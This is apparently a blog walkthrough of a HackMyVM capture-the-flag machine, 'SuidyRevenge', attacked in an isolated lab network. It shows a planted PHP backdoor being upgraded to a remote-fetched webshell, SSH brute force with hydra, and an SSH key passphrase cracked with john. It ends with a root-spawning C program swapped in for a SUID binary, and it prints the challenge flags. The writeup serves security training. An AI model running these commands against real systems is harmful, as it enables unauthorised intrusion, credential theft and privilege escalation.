0xBEN
/
Sign up to 0xBEN!
Already have an account? Sign in

HackMyVM | SuidyRevenge

In this walkthrough, I demonstrate how I obtained complete ownership of SuidyRevenge from HackMyVM
0xBEN
7 min read
HackMyVM | SuidyRevenge
https://downloads.hackmyvm.eu/suidyrevenge.zip
In: HackMyVM, Attack, CTF, Home Lab, Linux, Hard Challenge
ℹ️
I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN -- 10.9.9.0/24 -- that has no internet access

Nmap Results

# Nmap 7.94SVN scan initiated Fri Nov 22 18:42:29 2024 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.12
Nmap scan report for 10.9.9.12
Host is up (0.00043s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 99:04:21:6d:81:68:2e:d7:fe:5e:b2:2c:1c:a2:f5:3d (RSA)
|   256 b2:4e:c2:91:2a:ba:eb:9c:b7:26:69:08:a2:de:f2:f1 (ECDSA)
|_  256 66:4e:78:52:b1:2d:b6:9a:8b:56:2b:ca:e5:48:55:2d (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 22 18:42:37 2024 -- 1 IP address (1 host up) scanned in 7.99 seconds





Service Enumeration

TCP/80



Gobuster Enumeration

ℹ️
Some context on how I got to this point

I ran gobuster with some basic word lists like /usr/share/seclists/Discovery/Web-Content/big.txt and /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt and the -x php switch, but wasn't having any luck. So, then I had the bright idea to see if there's a word list for backdoors.
/simple-backdoor.php





Exploit

PHP Backdoor

💡
I tried establishing a reverse shell, but it seemed as if outbound connectivity is being blocked, so I tried for local file read instead
The initial backdoor was behaving badly, and seemed as if certain commands we blacklisted, simple enumeration revealed another backdoor
Supports RFI as well, which will allow me to upgrade to PHP web shell of my preference
curl -s https://raw.githubusercontent.com/WhiteWinterWolf/wwwolf-php-webshell/refs/heads/master/webshell.php -o pwn.php
sudo python3 -m http.server 80
Much more flexibility with this webshell
Reverse shell as www-data





Post-Exploit Enumeration

Operating Environment

OS & Kernel

PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

Linux suidyrevenge 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux

Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Sorry, user www-data may not run sudo on suidyrevenge.



Users and Groups

Local Users

murda:x:1000:1000:murda,,,:/home/murda:/bin/bash
violent:x:1001:1001:,,,:/home/violent:/bin/bash
yo:x:1002:1002:,,,:/home/yo:/bin/bash
ruin:x:1003:1003:,,,:/home/ruin:/bin/bash
theuser:x:1004:1004:,,,:/home/theuser:/bin/bash
suidy:x:1005:1005:,,,:/home/suidy:/bin/bash

Local Groups

cdrom:x:24:murda
floppy:x:25:murda
audio:x:29:murda
dip:x:30:murda
video:x:44:murda
plugdev:x:46:murda
netdev:x:109:murda
murda:x:1000:
violent:x:1001:
yo:x:1002:
ruin:x:1003:
theuser:x:1004:
suidy:x:1005:



Network Configurations

Network Interfaces

ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether bc:24:11:34:4c:48 brd ff:ff:ff:ff:ff:ff
    inet 10.9.9.12/24 brd 10.9.9.255 scope global dynamic ens18
       valid_lft 5961sec preferred_lft 5961sec
    inet6 fe80::be24:11ff:fe34:4c48/64 scope link 
       valid_lft forever preferred_lft forever



Interesting Files

/var/www/html/murdanote.txt

I always lost my password so Im using 
one password from rockyou.txt !

-murda

/usr/bin/violent

-rwsr-sr-x 1 root violent 16608 Oct  1  2020 /usr/bin/violent

/home/suid/suidyyyyy

-rwsrws--- 1 root theuser 16712 Oct  2  2020 /home/suidy/suidyyyyy





Privilege Escalation

Lateral to Murda

During the post-exploit enumeration phase, we found the local user, murda in addition to the note in the web directory. The note indicates we should be able to find a login for the user in the rockyou.txt word list.

hydra -I -V -f -l murda -P ~/Pentest/WordLists/rockyou.txt ssh://10.9.9.12
ssh murda@10.9.9.12
💡
From here, we work back through the post-exploit enumeration process. In my initial checks, murda does not have sudo privileges on the box.
It seems like the SSH private key for violent is somewhere accessible to us. If I had to guess, the key is password protected, but we can crack it with ssh2john.
find / -type f -name 'id_rsa' 2>/dev/null

Easy way to find the file named id_rsa on the system



Lateral to Violent

scp murda@10.9.9.12:/usr/games/id_rsa ./id_rsa

Copy the id_rsa file to our attack box for analysis

Indeed, the key is protected by a passphrase
ssh2john id_rsa > hash
john --wordlist=rockyou.txt hash
Passphrase for the SSH key is ihateu
ssh -i id_rsa violent@10.9.9.12
💡
Once again, we repeat the post-exploit enumeration process.
Always a good idea to check upon switching user
Pretty uneventful and after transferring the file locally and inspecting it further, that's the extent of the application. Just print a simple string to the console and exit.
At this point, I'm pretty stuck. I know I need to pivot and I'm pretty sure the next move is theuser, given the SUID binary in /home/suidy/suidyyyyy. But, I don't see any more clues or ways to pivot there from the current user.

Right now, the current list of users I haven't pivoted to are:

ruin
theuser
yo
suidy

So, I do some last ditch enumeration to find a way to pivot.
find / -type f \( -user yo -o -user ruin -o -user theuser -o -user suidy \) -exec ls -l {} \; 2>/dev/null
Try to find any interesting files owned by the remaining users, but nothing we have access to
grep -ilarE '^yo$|ruin|theuser|suidy' / 2>/dev/null | grep -vE '\/usr\/[share|include]|\/var\/lib' | xargs ls -l
Look for the usernames in any files on the system. /var/log/wtmp just shows the last login for the users, so no valuable data other than a successful login. The only other interesting file is one we've already seen, /var/www/html/index.html
💡
Looking back at the text again, the phrase, "He only changed my password to a different ..." is a little bit suspicious.



Make a Custom Word List

cewl http://10.9.9.12 -w wordlist.txt
hydra -I -f -V -L users.txt -P wordlist.txt ssh://10.9.9.12
That's quite frustrating...



Lateral to theuser

ssh theuser@10.9.9.12



Lateral to suidy

HackMyVM | suidy
In this walkthrough, I demonstrate how I obtained complete ownership of suidy from HackMyVM
0xBEN0xBEN

So, the privilege escalation is nearly the same as the previous box, but we need to ensure the compiled size of the binary is equal to the original

Becoming Root

Replacing the Binary

⚠️
Exit out of your session as suidyyyyy as you won't be able to replace the binary while the current SUID session holds the file open
The compiled size of the original binary is 16712 bytes.
nano /tmp/suidyyyyy.c

I'm just going to try the payload from my original article and see what the compiled size turns out to

#include <unistd.h>
#include <stdio.h>
int main (void)
{
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;   
}
gcc -o /tmp/suidyyyyy /tmp/suidyyyyy.c
How convenient! The compiled size just happens to be identical.
File replaced and the script run by root set the SUID bit



Flags

User

HMVbisoususeryay

Root

HMVvoilarootlala
Written by
0xBEN

0xBEN

View all posts
Comments
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.